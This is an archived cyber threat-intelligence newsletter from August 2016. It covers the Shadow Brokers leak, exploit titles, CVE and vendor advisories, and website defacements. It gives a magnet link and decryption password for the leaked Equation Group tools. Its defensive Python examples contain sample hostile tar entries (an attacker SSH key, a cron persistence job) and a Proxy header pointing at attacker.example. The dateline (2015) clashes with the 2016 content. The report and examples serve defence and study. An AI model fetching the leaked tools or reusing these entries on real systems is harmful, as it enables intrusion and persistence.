Source: informationwarfarecenter.com/cir/archived/pre/IWC-CIR-2016-August.pdf


Cyber Intelligence Report


Contents

Summary
Extra tips and videos
  Cyber Secrets
  Explanations
Article
News
  News: Information Warfare
  News: HIPAA
  News: SCADA
  News: Cyber Laws & Legislation
  News: Computer Forensics
Malicious Logic
  Exploits
Zone-h Interesting Website Defacements
Zone-h Interesting Website Defacements - Olympics
Zone-h Attack Statistics
Credits
Sponsors


Wednesday, August 18th, 2015

The Cyber Intelligence Report is an OSINT resource focusing on advanced persistent threats and other digital dangers. APTs fit into a cybercrime category directed at both business and political targets. Attack vectors include system compromise, social engineering, and even traditional espionage.

Summary

Symantec ThreatCon Level 2 - Medium: Increased alertness. This condition applies when knowledge or the expectation of attack activity is present, without specific events occurring, or when malicious code reaches a moderate risk rating.

Extra tips and videos

It has been a long time since the last Cyber Intelligence Report (CIR), and a lot has happened since. Below is a list of several Cyber Secrets episodes along with a couple of new videos covering what a Red Team penetration test is and what a Social Engineering assessment entails. As always, if you have any suggestions for improving the CIR or Cyber Secrets, feel free to let us know: [email protected]

Past Reports: www.informationwarfarecenter.com/Cyber-Intelligence-Report.html

Cyber Secrets:

• IWC-Lab Demo (Hacking Metasploitable with Armitage and Sparta)

Explanations:

• IWC-Lab (standalone hacking lab)


Article:

Author: Jeremy Martin, Sr. Security Researcher & Consultant

Cyber activity has increased during the Olympics, and the number of victim systems in Brazil has skyrocketed. At the time of this CIR, over 170 Brazilian domains and government agencies had been hacked. See the Zone-H Website Defacements - Olympics section of this report for details of many of the attacks.

---

Another interesting turn of events is an auction of tools allegedly stolen from the hacking group known as the "Equation Group". The Shadow Brokers originally pushed out the GPG-encrypted files and are asking for bitcoin in payment. As some of you have already heard, the Equation Group has allegedly been linked to the NSA and has been active for quite a while. Some believe that this group is the definition of a state-sponsored cyber threat.

If you are interested in looking at the information yourself, the original BitTorrent magnet link is:

magnet:?xt=urn:btih:40a5f1514514fb67943f137f7fde0a7b5e991f76&tr=http://diftracker.i2p/announce.php

You will need GnuPG to decrypt what is currently available. On Linux, decrypt the free sample file with this command (gpg will prompt for the passphrase, since the file is symmetrically encrypted):

gpg --decrypt --output eqgrp-free-file.tar.xz eqgrp-free-file.tar.xz.gpg

Password = theequationgroup

Many people say these are top-of-the-line tools. You can look at the information yourself to vet the validity of these possible tools.
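Decrypting the file is the easy part; the archive should be treated as hostile until proven otherwise, handled only in an isolated VM, and never extracted blind. Two checks are worth doing before anything else: record the SHA-256 of the blob you downloaded and of the decrypted .tar.xz so they can be compared with hashes other analysts publish, and list the tar members in memory, refusing any entry that would write outside the extraction directory (path traversal, absolute paths, links pointing out of the tree, device nodes). The Python below is an added example written for this report, not code from the original article or from the leaked material; the archive it builds is constructed for the demo, and the reason strings are this example's own.

```python
import hashlib
import io
import posixpath
import tarfile


def sha256_hex(data: bytes) -> str:
    """Digest to record for the .gpg blob and for the decrypted .tar.xz, so the
    copy you analyse can be compared with hashes other analysts publish."""
    return hashlib.sha256(data).hexdigest()


def _escapes_dest(path: str) -> bool:
    """True if a member name or link target would land outside the extraction dir."""
    if path.startswith("/"):
        return True
    return ".." in posixpath.normpath(path).split("/")


def unsafe_members(tar_xz: bytes) -> list[tuple[str, str]]:
    """Walk a .tar.xz held in memory and return (member, reason) for every entry
    that must block extraction.  Nothing is written to disk."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(tar_xz), mode="r:xz") as tar:
        for m in tar:
            if _escapes_dest(m.name):
                findings.append((m.name, "path escapes extraction directory"))
            elif (m.issym() or m.islnk()) and _escapes_dest(m.linkname):
                findings.append((m.name, "link target escapes extraction directory"))
            elif m.isdev() or m.isfifo():
                findings.append((m.name, "device or FIFO node"))
    return findings


def build_sample_archive() -> bytes:
    """Constructed sample archive for this demo; it is not the leaked file.
    One benign member plus three that a careless `tar xf` would act on."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:xz") as tar:
        def add(name: str, content: bytes) -> None:
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))

        add("tools/README", b"sample\n")
        add("../../root/.ssh/authorized_keys", b"ssh-ed25519 AAAA... attacker\n")
        add("/etc/cron.d/persist", b"* * * * * root /tmp/.x\n")
        link = tarfile.TarInfo("tools/etc")   # symlink whose target is outside the tree
        link.type = tarfile.SYMTYPE
        link.linkname = "/etc"
        tar.addfile(link)
    return buf.getvalue()


if __name__ == "__main__":
    data = build_sample_archive()
    print("sha256", sha256_hex(data))
    for name, reason in unsafe_members(data):
        print(f"REFUSE {name}: {reason}")
```

On Python 3.12 and later, `tar.extractall(path, filter="data")` refuses the same kinds of entries at extraction time; listing first is still preferable because it touches no disk and gives you the member names to report.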


News:

News: Information Warfare

• Powerful NSA espionage tools with code names like 'Epicbanana' exposed online - Toronto Star.

• Egypt prosecution appeals Morsi acquittal in 'Qatar espionage case' - Ahram Online.

• Britain's Nuclear Future Threatened By Espionage And The Brexit - OilPrice.com.

• Shakti Trojan: Stealth malware designed for espionage ... - International Business Times UK.

• Aviation's gatekeepers call on governments and hackers alike to tackle cyberthreats - Tnooz.

• Big Banks Form New Group to Combat Cyber Threats | Big Law ... - Bloomberg Big Law Business.

• A Three-pronged Approach for Fighting Foreign Cyber Attacks ... - Signal Magazine.

• China Launches Quantum Satellite To Test Spooky Action At A Distance.

• Iran Investigating Possible Cyber Angle On Oil Fires.

• Baltimore Police Accused Of Illegal Mobile Spectrum Use With Stingrays.

• Snowden Thinks Russia Hacked The NSA.

• Hacker Claims To Be Selling Stolen NSA Spy Tools.

• Latest Windows UAC Bypass Permits Code Execution.

• Hacker Wins $5,000 For Address Bar Spoofing Flaw.

• The NSA's Equation Group May Have Been Compromised.

• Forensics Tool Nabs Data From Signal, Telegram, WhatsApp.

• Sage Data Breach May Impact Hundreds Of Business Customers.

• Alleged Russian Hacker Seleznev Goes On Trial In US.

• 20 Top US Hotels Hit By Fresh Malware Attacks.

• Hacker Reveals Personal Information For Almost 200 Democrats.

• How An IP Mapping Glitch Turned A Farm Into Federal Hell.

• Imperva Under Pressure To Find Buyer After Disappointing Results.

• Think You Can Take Out A Swarm Of Attack Drones?

• 100 Million Volkswagens At Risk With New Wireless Key Hack.

• Linux.Lady Trojan Turns Linux Servers Into Bitcoin Miners.

• Dota 2 Chat Forum Hit By Hack Attack.

• Exodus Ups Ante Against Apple With $500,000 Bounty.

• Hitler Ransomware Goose-Steps Onto PCs.

• Australian Census Attacked By Hackers.

• Microsoft Proves Backdoor Keys Are A Terrible Idea.


News: HIPAA

• How to verify your HIPAA compliance - BetaNews.

• Nine Tips For Avoiding HIPAA Breaches When Responding To ... - Mondaq News Alerts

• Encrypting PHI for HIPAA Compliance - Renal and Urology News - Renal and Urology News.

• 10 largest HIPAA settlement fines - Becker's Hospital Review - Becker's Hospital Review.

• It's Not the Olympics, but OCR Sets New HIPAA Settlement Records - Lexology (registration).

News: SCADA

• SCADA Market – Global Industry Analysis, Size, Share, Growth, Trends and Forecast - PACE Today.

• Big Data and the evolution from traditional to IIoT SCADA - Windpower Engineering.

• New ISA Standards Committee to Improve SCADA Systems - Automation World.

• Don't Get Caught Without a SCADA Migration Plan - ARC Advisory Group (blog).

• ISA launches SCADA Systems Standards Committee - InTech.

News: Cyber Laws & Legislation

• Pakistan adopts controversial law to deal with cyber crimes - Times of India.

• Cyber Civil Corps proposed to protect Australia's economy - ZDNet.

• Besieged Mugabe goes for 'cyber terrorists' with draconian law - The Zimbabwe Standard.

• American Economic Activity Is Rooted In Global Flow Of Information - Forbes.

• Business consortium wants China to change proposed cyber laws - ZDNet.

News: Computer Forensics

• Computer Crime Laws Need An Update (Perspective) - Bloomberg Big Law Business.

• Hacker group claims to have stolen NSA 'cyberweapons' - Duluth News Tribune.

• Understanding the JAG program purpose areas - Police News.

• Cybersecurity Strategy - Do You Have One Yet? - CIOReview.

• CRIME SCENE INVESTIGATOR I Job - City of Farmington - PoliceOne - Police News.


Malicious Logic:

Exploits

• QNAP QTS 4.2.1 Build 20160601 Arbitrary File Overwrite.

• QNAP QTS 4.2.0 Build 20160311 / Build 20160601 Cross Site Scripting.

• QNAP QTS 4.2.0 Build 20160311 / Build 20160601 Command Injection.

• QNAP QTS 4.2.1 Build 20160601 Command Injection.

• SIEMENS IP Camera CCMW1025 x.2.2.1798 Change Admin User / Password.

• Honeywell IP-Camera HICC-1100PT Credential Disclosure.

• EXTRABACON Cisco ASA Remote Code Execution.

• ESCALATEPLOWMAN WatchGuard Privilege Escalation.

• EPICBANANA Cisco ASA / PIX Privilege Escalation.

• ELIGIBLECONTESTANT TOPSEC Remote Code Execution.

• ELIGIBLECANDIDATE TOPSEC Remote Code Execution.

• ELIGIBLEBOMBSHELL TOPSEC Remote Code Execution.

• ELIGIBLEBACHELOR TOPSEC Firewall Exploit.

• EGREGIOUSBLUNDER Fortigate Remote Code Execution.

• Metasploit Service Persistence Module.

• Metasploit Cron Persistence Module.

• Siemens IP-Camera Unauthenticated Remote Credential Disclosure.

• Microsoft Windows Kernel win32k.sys FON Divide-By-Zero.

• Microsoft GDI+ EMR_EXTTEXTOUTA / EMR_POLYTEXTOUTA Buffer Overflow.

• Microsoft GDI+ DecodeCompressedRLEBitmap Out-Of-Bounds Write.

• Microsoft GDI+ ValidateBitmapInfo Out-Of-Bounds Write.

• NetIQ Access Manager iManager 2.7.7.6 / 2.7.7.5 Cross Site Scripting.

• Pi-Hole 2.8.1 Cross Site Scripting.

• GitLab Impersonate Privilege Escalation.

• Microsoft Office Word 2013 / 2016 Denial Of Service.


CVE Advisories:

• CVE-2015-2790.

2015-03-30 Foxit Reader, Enterprise Reader, and PhantomPDF before 7.1 allow remote attackers to cause a denial of service (memory corruption and crash) via a crafted (1) Ubyte Size in a DataSubBlock structure or (2) LZWMinimumCodeSize in a GIF image. (CVSS:4.3) (Last Update:2015-07-02)

• CVE-2015-2789.

2015-03-30 Unquoted Windows search path vulnerability in the Foxit Cloud Safe Update Service in the Cloud plugin in Foxit Reader 6.1 through 7.0.6.1126 allows local users to gain privileges via a Trojan horse program in the %SYSTEMDRIVE% folder. (CVSS:4.4) (Last Update:2015-03-31)

• CVE-2015-2701.

2015-03-25 Cross-site request forgery (CSRF) vulnerability in CS-Cart 4.2.4 allows remote attackers to hijack the authentication of users for requests that change a user password via a request to profiles-update/. (CVSS:6.8) (Last Update:2015-03-26)

• CVE-2015-2680.

2015-03-23 Cross-site request forgery (CSRF) vulnerability in MetalGenix GeniXCMS before 0.0.2 allows remote attackers to hijack the authentication of administrators for requests that add an administrator account via a request in the users page to gxadmin/index.php. (CVSS:6.8) (Last Update:2015-03-24)

• CVE-2015-2679.

2015-03-23 Multiple SQL injection vulnerabilities in MetalGenix GeniXCMS before 0.0.2 allow remote attackers to execute arbitrary SQL commands via the (1) page parameter to index.php or (2) username parameter to gxadmin/login.php. (CVSS:7.5) (Last Update:2015-03-24)

• CVE-2015-2678.

2015-03-23 Multiple cross-site scripting (XSS) vulnerabilities in MetalGenix GeniXCMS before 0.0.2 allow remote attackers to inject arbitrary web script or HTML via the (1) cat parameter in the categories page to gxadmin/index.php or (2) page parameter to index.php. (CVSS:4.3) (Last Update:2015-03-24)


• CVE-2015-2564.

2015-03-20 SQL injection vulnerability in client-edit.php in ProjectSend (formerly cFTP) r561 allows remote authenticated users to execute arbitrary SQL commands via the id parameter to users-edit.php. (CVSS:6.5) (Last Update:2015-03-23)

• CVE-2015-2275.

2015-03-12 Cross-site scripting (XSS) vulnerability in WoltLab Community Gallery 2.0 before 2014-12-26 allows remote attackers to inject arbitrary web script or HTML via the parameters[data][7][title] parameter in a saveImageData action to index.php/AJAXProxy. (CVSS:4.3) (Last Update:2015-09-24)

• CVE-2015-2218.

2015-03-05 Multiple cross-site scripting (XSS) vulnerabilities in the wp_ajax_save_item function in wonderpluginaudio.php in the WonderPlugin Audio Player plugin before 2.1 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) item[name] or (2) item[customcss] parameter in a wonderplugin_audio_save_item action to wp-admin/admin-ajax.php or the itemid parameter in the (3) wonderplugin_audio_show_item or (4) wonderplugin_audio_edit_item page to wp-admin/admin.php. (CVSS:4.3) (Last Update:2015-03-05)

• CVE-2015-2216.

2015-03-05 SQL injection vulnerability in ecomm-sizes.php in the Photocrati theme 4.x for WordPress allows remote attackers to execute arbitrary SQL commands via the prod_id parameter. (CVSS:7.5) (Last Update:2015-11-24)

• CVE-2015-2208.

2015-03-12 The saveObject function in moadmin.php in phpMoAdmin 1.1.2 allows remote attackers to execute arbitrary commands via shell metacharacters in the object parameter. (CVSS:7.5) (Last Update:2015-03-12)

• CVE-2015-2199.

2015-03-03 Multiple SQL injection vulnerabilities in the WonderPlugin Audio Player plugin before 2.1 for WordPress allow (1) remote authenticated users to execute arbitrary SQL commands via the item[id] parameter in a wonderplugin_audio_save_item action to wp-admin/admin-ajax.php or remote administrators to execute arbitrary SQL commands via the itemid parameter in the (2) wonderplugin_audio_show_item, (3) wonderplugin_audio_show_items, or (4) wonderplugin_audio_edit_item page to wp-admin/admin.php. (CVSS:6.5) (Last Update:2015-03-04)

• CVE-2015-2198.

2015-03-03 Multiple cross-site scripting (XSS) vulnerabilities in edit_prefs.php in Beehive Forum 1.4.4 allow remote attackers to inject arbitrary web script or HTML via the (1) homepage_url, (2) pic_url, or (3) avatar_url parameter, which are not properly handled in an error message. (CVSS:4.3) (Last Update:2015-03-04)

• CVE-2015-2196.

2015-03-03 SQL injection vulnerability in Spider Event Calendar 1.4.9 for WordPress allows remote attackers to execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php. (CVSS:7.5) (Last Update:2015-03-04)

• CVE-2015-2184.

2015-03-10 ZeusCart 4 allows remote attackers to obtain configuration information via a getphpinfo action to admin/, which calls the phpinfo function. (CVSS:5.0) (Last Update:2015-03-11)

Advisories:

• Debian Security Advisory 3650-1.

Thu, 18 Aug 2016 16:50:09 GMT Debian Linux Security Advisory 3650-1 - Felix Doerre and Vladimir Klebanov from the Karlsruhe Institute of Technology discovered a flaw in the mixing functions of Libgcrypt's random number generator. An attacker who obtains 4640 bits from the RNG can trivially predict the next 160 bits of output.

• Debian Security Advisory 3649-1.

Thu, 18 Aug 2016 16:50:00 GMT Debian Linux Security Advisory 3649-1 - Felix Doerre and Vladimir Klebanov from the Karlsruhe Institute of Technology discovered a flaw in the mixing functions of GnuPG's random number generator. An attacker who obtains 4640 bits from the RNG can trivially predict the next 160 bits of output.

• Cisco Security Advisory 20160817-asa-snmp.

Thu, 18 Aug 2016 16:49:44 GMT Cisco Security Advisory - A vulnerability in the Simple Network Management Protocol (SNMP) code of Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated, remote attacker to cause a reload of the affected system or to remotely execute code. The vulnerability is due to a buffer overflow in the affected code area. An attacker could exploit this vulnerability by sending crafted SNMP packets to the affected system. An exploit could allow the attacker to execute arbitrary code and obtain full control of the system or to cause a reload of the affected system. The attacker must know the SNMP community string to exploit this vulnerability. Note: Only traffic directed to the affected system can be used to exploit this vulnerability. This vulnerability affects systems configured in routed and transparent firewall mode only and in single or multiple context mode. This vulnerability can be triggered by IPv4 traffic only. Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability.
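This advisory (cisco-sa-20160817-asa-snmp) is Cisco's response to the SNMP bug targeted by the EXTRABACON exploit listed in the Exploits section above. The two preconditions Cisco states, that the attacker must know the community string and that the traffic must be directed at the appliance, are exactly what a configuration audit can check: which hosts are allowed to poll, on which interface, with what community, and whether SNMPv1/v2c (community string in the clear) is still in use. The Python below is an added example written for this report, not Cisco tooling; the ASA configuration excerpt is constructed for the demo, and the assumption that ASA treats a host line without a version keyword as SNMPv1 should be confirmed against your release.

```python
import re

# Constructed ASA configuration excerpt for the demo (not taken from any real device).
SAMPLE_ASA_CONFIG = """\
interface GigabitEthernet0/0
 nameif outside
 security-level 0
interface GigabitEthernet0/1
 nameif inside
 security-level 100
snmp-server host inside 10.10.5.20 community S3cure-Str1ng version 2c
snmp-server host inside 10.10.5.21
snmp-server host outside 203.0.113.9 poll community public version 2c
snmp-server community public
snmp-server location DC-1
"""

GUESSABLE_COMMUNITIES = {"public", "private", "cisco"}

# snmp-server host <iface> <addr> [trap|poll] [community <str>] [version <v>]
HOST_RE = re.compile(
    r"^snmp-server host (?P<iface>\S+) (?P<addr>\S+)"
    r"(?: (?:trap|poll))?(?: community (?P<community>\S+))?(?: version (?P<version>\S+))?"
)
COMMUNITY_RE = re.compile(r"^snmp-server community (?P<community>\S+)")


def audit_asa_snmp(config: str, untrusted_interfaces=("outside",)) -> list[str]:
    """Flag SNMP managers that widen exposure to the SNMP bug: pollers reachable
    via an untrusted interface, guessable community strings (the advisory's
    precondition), and v1/v2c, where the community crosses the wire in clear text."""
    global_community = None
    hosts = []
    for raw in config.splitlines():
        line = raw.strip()
        m = COMMUNITY_RE.match(line)
        if m:
            global_community = m["community"]   # fallback for host lines without one
            continue
        m = HOST_RE.match(line)
        if m:
            hosts.append(m.groupdict())

    findings = []
    for h in hosts:
        community = h["community"] or global_community
        version = h["version"] or "1"   # assumption: no keyword means SNMPv1 on ASA
        if h["iface"] in untrusted_interfaces:
            findings.append(f"{h['addr']}: SNMP manager allowed on untrusted interface {h['iface']}")
        if community and community.lower() in GUESSABLE_COMMUNITIES:
            findings.append(f"{h['addr']}: guessable community string '{community}'")
        if version != "3":
            findings.append(f"{h['addr']}: SNMPv{version}, community string sent in clear text")
    return findings


if __name__ == "__main__":
    for finding in audit_asa_snmp(SAMPLE_ASA_CONFIG):
        print(finding)
```

Run it against `show running-config` output; every line it prints is a host that should be removed, moved behind a management interface, given a strong community, or migrated to SNMPv3 with authentication and privacy while the software update is scheduled.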

• Red Hat Security Advisory 2016-1625-02.

Wed, 17 Aug 2016 23:24:00 GMT Red Hat Security Advisory 2016-1625-02 - This release of Red Hat JBoss Core Services Service Pack 1 serves as a replacement for JBoss Core Services Apache HTTP Server. Security Fix: It was discovered that Apache HTTP Server used the value of the Proxy header from HTTP requests to initialize the HTTP_PROXY environment variable for CGI scripts, which in turn was incorrectly used by certain HTTP client implementations to configure the proxy for outgoing HTTP requests. A remote attacker could possibly use this flaw to redirect HTTP requests performed by a CGI script to an attacker-controlled proxy via a malicious HTTP request.

• Red Hat Security Advisory 2016-1624-01.

Wed, 17 Aug 2016 23:23:00 GMT Red Hat Security Advisory 2016-1624-01 - This release of Red Hat JBoss Web Server 3.0.3 Service Pack 1 serves as an update for Red Hat JBoss Web Server 3.0.3 httpd and tomcat. Security Fix: It was discovered that httpd used the value of the Proxy header from HTTP requests to initialize the HTTP_PROXY environment variable for CGI scripts, which in turn was incorrectly used by certain HTTP client implementations to configure the proxy for outgoing HTTP requests. A remote attacker could possibly use this flaw to redirect HTTP requests performed by a CGI script to an attacker-controlled proxy via a malicious HTTP request.
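The two Red Hat advisories above describe the same mechanism: the CGI specification (RFC 3875) turns every request header "Name: value" into a meta-variable HTTP_NAME, so a client-supplied "Proxy" header becomes HTTP_PROXY in the CGI process, and HTTP client libraries that honour HTTP_PROXY from the environment then send the script's own outbound requests through the attacker's proxy. The Python below is an added example written for this report, not Red Hat's or Apache's code; the request it parses is constructed, and the only real configuration directive it refers to is Apache's published mod_headers workaround `RequestHeader unset Proxy early`.

```python
from typing import Iterable, Mapping, Optional

# Constructed request for the demo: an ordinary CGI request with an attacker-added
# "Proxy:" header.  Lower-case spelling on purpose: the CGI mapping upper-cases it.
RAW_REQUEST = (
    b"GET /cgi-bin/lookup.cgi?sku=42 HTTP/1.1\r\n"
    b"Host: shop.example\r\n"
    b"User-Agent: curl/7.47.0\r\n"
    b"proxy: http://attacker.example:8080\r\n"
    b"\r\n"
)


def parse_headers(raw: bytes) -> list[tuple[str, str]]:
    """Split the header block of a raw HTTP/1.1 request into (name, value) pairs."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    pairs = []
    for line in head.split("\r\n")[1:]:          # [0] is the request line
        name, _, value = line.partition(":")     # first colon only; URLs keep theirs
        if name:
            pairs.append((name.strip(), value.strip()))
    return pairs


def cgi_environ(headers: Iterable[tuple[str, str]], drop_proxy: bool = False) -> dict[str, str]:
    """The RFC 3875 step a CGI-capable server performs: "Name: value" becomes
    HTTP_NAME (upper-cased, '-' replaced by '_').  That rule turns a client-sent
    "Proxy" header into HTTP_PROXY.  drop_proxy=True discards the header first,
    which is what the patched httpd builds do and what the mod_headers workaround
    "RequestHeader unset Proxy early" achieves."""
    env: dict[str, str] = {}
    for name, value in headers:
        var = "HTTP_" + name.upper().replace("-", "_")
        if drop_proxy and var == "HTTP_PROXY":
            continue
        env[var] = value
    return env


def client_proxy(env: Mapping[str, str]) -> Optional[str]:
    """Behaviour of the affected HTTP client libraries inside the CGI process:
    honour HTTP_PROXY from the environment, a shell convention that must not
    apply to a variable the remote client can set."""
    return env.get("HTTP_PROXY")


def outbound_route(raw_request: bytes, hardened: bool) -> str:
    """End to end: where the CGI script's own outbound HTTP call would be routed."""
    env = cgi_environ(parse_headers(raw_request), drop_proxy=hardened)
    return client_proxy(env) or "direct"


if __name__ == "__main__":
    print("vulnerable server:", outbound_route(RAW_REQUEST, hardened=False))
    print("hardened server:  ", outbound_route(RAW_REQUEST, hardened=True))
```

The fix belongs on the server side (strip the header before the CGI environment is built) rather than in every client library, because any library that reads HTTP_PROXY is affected the same way; a request log grep for a `Proxy` request header is a cheap check for whether anyone has been probing for it.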

• Ubuntu Security Notice USN-3063-1.

Wed, 17 Aug 2016 17:40:11 GMT Ubuntu Security Notice 3063-1 - Tobias Stoeckmann discovered that Fontconfig incorrectly handled cache files. A local attacker could possibly use this issue with a specially crafted cache file to elevate privileges.

• Cisco Security Advisory 20160817-fmc.

Wed, 17 Aug 2016 17:39:23 GMT Cisco Security Advisory - A vulnerability in the web-based GUI of Cisco Firepower Management Center and Cisco Adaptive Security Appliance (ASA) 5500-X Series with FirePOWER Services could allow an authenticated, remote attacker to perform unauthorized remote command execution on the affected device. The vulnerability is due to insufficient authorization checking. An attacker could exploit this vulnerability by sending crafted HTTP requests to the affected device. Successful exploitation could allow an authenticated attacker to execute system commands with root-level privileges. Cisco has released software updates that address this vulnerability. Workarounds that address this vulnerability are not available.

• Cisco Security Advisory 20160817-apic.

Wed, 17 Aug 2016 17:39:15 GMT Cisco Security Advisory - A vulnerability in the Grapevine update process of the Cisco Application Policy Infrastructure Controller Enterprise Module (APIC-EM) could allow an authenticated, remote attacker to execute arbitrary commands on the underlying operating system with the privileges of the root user. The vulnerability is due to insufficient input sanitization during the Grapevine update process. An attacker could exploit this vulnerability by authenticating to the affected system with administrative privileges and inserting arbitrary commands into an upgrade parameter. An exploit could allow the attacker to execute arbitrary commands on the affected system with root-level privileges. Cisco has released software updates that address this vulnerability. Workarounds that address this vulnerability are not available.

• Cisco Security Advisory 20160817-firepower.

Wed, 17 Aug 2016 17:39:09 GMT Cisco Security Advisory - A vulnerability in the web-based GUI of Cisco Firepower Management Center and Cisco Adaptive Security Appliance (ASA) 5500-X Series with FirePOWER Services could allow an authenticated, remote attacker to elevate the privileges of user accounts on the affected device. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending crafted HTTP requests to the affected device. Successful exploitation could allow an authenticated attacker to elevate the privileges of user accounts configured on the device. Cisco has released software updates that address this vulnerability. Workarounds that address this vulnerability are not available.

• Ubuntu Security Notice USN-3062-1.

Wed, 17 Aug 2016 00:38:37 GMT Ubuntu Security Notice 3062-1 - Multiple vulnerabilities were discovered in the OpenJDK JRE related to information disclosure, data integrity, and availability. An attacker could exploit these to cause a denial of service, expose sensitive data over the network, or possibly execute arbitrary code. A vulnerability was discovered in the OpenJDK JRE related to data integrity. An attacker could exploit this to expose sensitive data over the network or possibly execute arbitrary code. Various other issues were also addressed.

• Red Hat Security Advisory 2016-1617-01.

Tue, 16 Aug 2016 21:09:59 GMT Red Hat Security Advisory 2016-1617-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Security Fix: A flaw was found in the way certain interfaces of the Linux kernel's Infiniband subsystem used write() as a bi-directional ioctl() replacement, which could lead to insufficient memory security checks when being invoked using the splice() system call. A local unprivileged user on a system with either Infiniband hardware present or the RDMA Userspace Connection Manager Access module explicitly loaded could use this flaw to escalate their privileges on the system.

• HP Security Bulletin HPSBHF03441 1.

Tue, 16 Aug 2016 15:37:05 GMT HP Security Bulletin HPSBHF03441 1 - Potential security vulnerabilities have been identified in HPE Integrated Lights Out 3 and HPE Integrated Lights Out 4, and Integrated Lights Out 4 mRCA. The vulnerabilities could lead to multiple remote vulnerabilities. Revision 1 of this advisory.

• SAP Hybris E-commerce Suite 5.1.0.3 Hard-Coded Password.

Tue, 16 Aug 2016 15:21:28 GMT SAP Hybris E-commerce Suite version 5.1.0.3 suffers from a hard-coded password vulnerability.

• HP Security Bulletin HPSBGN03634 1.

Tue, 16 Aug 2016 15:20:59 GMT HP Security Bulletin HPSBGN03634 1 - A potential security vulnerability has been identified in HPE Enterprise Solution Sizers and Storage Sizer running Smart Update. The vulnerability could be exploited remotely to allow arbitrary code execution. Revision 1 of this advisory.

• php-gettext Code Execution.

Tue, 16 Aug 2016 15:19:37 GMT php-gettext versions prior to 1.0.12 suffer from a code execution vulnerability.


Zone-H Interesting Website Defacements:

Notifier Domain OS View

4ng3lz Team cetucker.scripts.mit.edu Linux mirror

4ng3lz Team dll.scripts.mit.edu Linux mirror

4ng3lz Team ecastill.scripts.mit.edu Linux mirror

4ng3lz Team eso.scripts.mit.edu Linux mirror

4ng3lz Team hazhir.scripts.mit.edu Linux mirror

4ng3lz Team japarker.scripts.mit.edu Linux mirror

4ng3lz Team jeffd.scripts.mit.edu/riyer/ Linux mirror

4ng3lz Team jgranja.scripts.mit.edu Linux mirror

4ng3lz Team jjzhang.scripts.mit.edu Linux mirror

4ng3lz Team jnbarrot.scripts.mit.edu Linux mirror

4ng3lz Team jorlin.scripts.mit.edu Linux mirror

4ng3lz Team jwilkin.scripts.mit.edu Linux mirror

4ng3lz Team jyates.scripts.mit.edu Linux mirror

4ng3lz Team mmarx.scripts.mit.edu Linux mirror

4ng3lz Team nbergman.scripts.mit.edu Linux mirror

4ng3lz Team olenka.scripts.mit.edu Linux mirror

4ng3lz Team pazoulay.scripts.mit.edu Linux mirror

4ng3lz Team retsef.scripts.mit.edu Linux mirror

4ng3lz Team rnchen.scripts.mit.edu Linux mirror

4ng3lz Team robertof.scripts.mit.edu Linux mirror

4ng3lz Team roshea.scripts.mit.edu Linux mirror

4ng3lz Team shroff.scripts.mit.edu Linux mirror

Admeral zino_DZ mcdermott.house.gov/az.htm Linux mirror

Anamal web.ornl.gov/cgi-bin/cgiwrap/l... Unknown mirror

Ashiyane Digital Security Team www.dickinsoncountymi.gov/imag... Win 2008 mirror

cyber-71 www.broadview-il.gov Linux mirror

Et04 beta.dublinohiousa.gov Linux mirror

Et04 communityplan.dublinohiousa.gov Linux mirror

Et04 dublinohiousa.gov Linux mirror

Et04 dubnet.dublinohiousa.gov Linux mirror

Et04 hbc.dublinohiousa.gov Linux mirror

Et04 makingithappen.dublinohiousa.gov Linux mirror

Et04 openforbusiness.dublinohiousa.gov Linux mirror

Et04 www.bridgestreet.dublinohiousa... Linux mirror

Et04 www.econdev.dublinohiousa.gov Linux mirror

Et04 www.globalinstitute.dublinohio... Linux mirror

jok3r remap.ucla.edu/modules/mod_ppc... Linux mirror

jok3r schepens.harvard.edu/modules/m... Linux mirror

Monsters Defacers www.cutlerbay-fl.gov Linux mirror

OniXeeMa www.gallatin-tn.gov Linux mirror

ProtoWave Reloaded facultyrecruiting.wharton.upen... Win 2012 mirror

ProtoWave Reloaded metalab.harvard.edu Linux mirror

ProtoWave Reloaded spanish-portuguese.berkeley.ed... Linux mirror

ProtoWave Reloaded teach.appinventor.mit.edu Linux mirror

Rap Morix www.lanesboro-mn.gov/site/news... Linux mirror


Zone-H Interesting Website Defacements - Olympics:

Notifier Domain OS View

~XHunter~ camaraipua.sp.gov.br Linux mirror

5ub50l0 www.lifanmotors.com.br/carros/ Win 2008 mirror

aDriv4 biblioteca.piracicaba.sp.gov.br Linux mirror

aDriv4 camarasaocarlos.sp.gov.br/vzla... Linux mirror

aDriv4 ci.piracicaba.sp.gov.br Linux mirror

aDriv4 comdema.piracicaba.sp.gov.br Linux mirror

aDriv4 conselhocontribuintes.piracica... Linux mirror

aDriv4 conselhos.piracicaba.sp.gov.br Linux mirror

aDriv4 epatespo.piracicaba.sp.gov.br Linux mirror

aDriv4 financas.piracicaba.sp.gov.br Linux mirror

aDriv4 guardacivil.piracicaba.sp.gov.br Linux mirror

aDriv4 lagarto.se.gov.br/novo/vzla.htm Linux mirror

aDriv4 sedema.piracicaba.sp.gov.br Linux mirror

aDriv4 selam.piracicaba.sp.gov.br Linux mirror

aDriv4 sema.piracicaba.sp.gov.br Linux mirror

aDriv4 semac.piracicaba.sp.gov.br Linux mirror

aDriv4 semad.piracicaba.sp.gov.br Linux mirror

aDriv4 semdec.piracicaba.sp.gov.br Linux mirror

aDriv4 semtre.piracicaba.sp.gov.br Linux mirror

aDriv4 semuttran.piracicaba.sp.gov.br Linux mirror

aDriv4 setur.piracicaba.sp.gov.br Linux mirror

aDriv4 transparencia.piracicaba.sp.go... Linux mirror

aDriv4 urbal.piracicaba.sp.gov.br Linux mirror

aDriv4 www.cerest.piracicaba.sp.gov.b... Linux mirror

aDriv4 www.direito.uff.br/vzla.htm Linux mirror

aDriv4 www.missal.pr.gov.br/industria... Linux mirror

aDriv4 www.piracicaba.sp.gov.br Linux mirror

Ali Morshedloo escudoazul.arquivonacional.gov... Win 2003 mirror

Anarchy Ghost ead.cgu.gov.br F5 Big-IP mirror

